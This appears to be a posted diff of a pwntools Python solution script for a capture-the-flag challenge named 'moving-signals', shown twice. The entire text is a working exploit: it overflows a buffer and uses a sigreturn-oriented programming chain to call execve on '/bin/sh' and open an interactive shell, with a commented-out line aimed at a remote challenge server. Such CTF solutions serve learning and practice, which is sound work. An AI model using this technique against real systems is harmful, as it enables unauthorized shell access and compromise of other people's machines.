lionaneesh · March 15, 2021 11:07
diff --git a/solve_moving-signals.py b/solve_moving-signals.py
 from pwn import *
 binary = ELF("./moving-signals")
 pr = process("./moving-signals")
 #pr = remote("161.97.176.150", 2525)
 buff = 0x7ffd4ac736b0
 pop_rax_ret = 0x0000000000041018
 binshstr = 0x41250
 syscall_ret = 0x41015
 frame = SigreturnFrame(arch="amd64", kernel="amd64")
 frame.rax = 59
 frame.rdi = binshstr
 frame.rsi = 0
 frame.rdx = 0
 frame.rsp = 0xdeadbeef
 frame.rip = syscall_ret


 offset = 8
 length = 500
 p = b"A" * offset + p64(pop_rax_ret)
 p += p64(0xf)
 p += p64(syscall_ret)
 p += bytes(frame)

 raw_input("Waiting!")
 pr.sendline(p)

 pr.interactive()
	from pwn import *
	binary = ELF("./moving-signals")
	pr = process("./moving-signals")
	#pr = remote("161.97.176.150", 2525)
	buff = 0x7ffd4ac736b0
	pop_rax_ret = 0x0000000000041018
	binshstr = 0x41250
	syscall_ret = 0x41015
	frame = SigreturnFrame(arch="amd64", kernel="amd64")
	frame.rax = 59
	frame.rdi = binshstr
	frame.rsi = 0
	frame.rdx = 0
	frame.rsp = 0xdeadbeef
	frame.rip = syscall_ret


	offset = 8
	length = 500
	p = b"A" * offset + p64(pop_rax_ret)
	p += p64(0xf)
	p += p64(syscall_ret)
	p += bytes(frame)

	raw_input("Waiting!")
	pr.sendline(p)

	pr.interactive()